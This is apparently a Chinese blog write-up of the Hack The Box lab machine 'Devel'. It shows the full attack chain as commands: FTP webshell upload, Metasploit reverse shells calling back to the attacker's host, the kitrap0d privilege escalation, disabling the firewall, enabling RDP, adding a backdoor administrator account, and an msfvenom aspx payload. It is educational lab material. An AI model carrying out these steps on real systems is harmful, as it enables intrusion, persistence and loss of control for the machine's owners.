Devel-10.10.10.5

本次所使用的工具
nmap(zenmap)、remmina、冰蝎、FileZila(连接ftp的图形界面工具)

Devel - 10.10.10.5
2019年9月5日 11:02:45

1. 信息收集

nmap -T4 -A -v 10.10.10.5


开放21和80端口。
80端口访问后未IIS 7.5默认页面。

2. 获取Webshell

FTP存在匿名访问,FTP根目录为IIS的Web页面根目录。
使用FileZilla连接FTP后,上传冰蝎的Webshell到IIS路径下。


冰蝎客户端连接成功,查看当前用户,用户为web。

3.提权

用户为普通账号权限,无法进行账号添加及查看管理员文件的权限,尝试提权操作。这里使用MSF尝试进行提权。
开启MSF监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.16.66

冰蝎客户端i填写IP和端口,进行连接

MSF成功获取反弹Shell。

使用local_exploit_suggester模块获取提权建议

#将当前会话放入后台
background

use post/multi/recon/local_exploit_suggester
set session 1
set showdescription true
run

执行后获得多个提权建议,尝试使用ms10_015_kitrap0d

use exploit/windows/local/ms10_015_kitrap0d
set session 1
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.16.66
run

执行成功后,得到SYSTEM权限。
在这里插入图片描述

4.开启远程桌面

修改注册表,开启远程桌面

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

关闭防火墙

NetSh Advfirewall set allprofiles state off

添加管理员用户

net user hacker P@ssw0rd /add
net localgroup Administrators hacker /add

远程桌面开启成功
在这里插入图片描述

5. 登陆远程桌面,查找flag

先再资源管理器点击下Administrator等账号的文件夹,获取访问权限。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LFfiP2z2-1571990974453)(_v_images/20190918110943311_23442.png)]

6. flag

root:e621a0b5041708797c4fc4728bc72b4b
user:9ecdd6a3aedf24b41562fea70f4cb3e8

7. MSF生成Webshell

生成一个aspx格式的Webshell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.66 LPORT=4444 -f aspx > shell.aspx

生成的文件上传到服务器,开启MSF进行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.16.66
run

浏览器访问http://10.10.10.5/shell.aspx,触发反弹shell,msfconsole成功获取到会话。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hL6fBkln-1571990974453)(_v_images/20190918111024614_28061.png)]

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值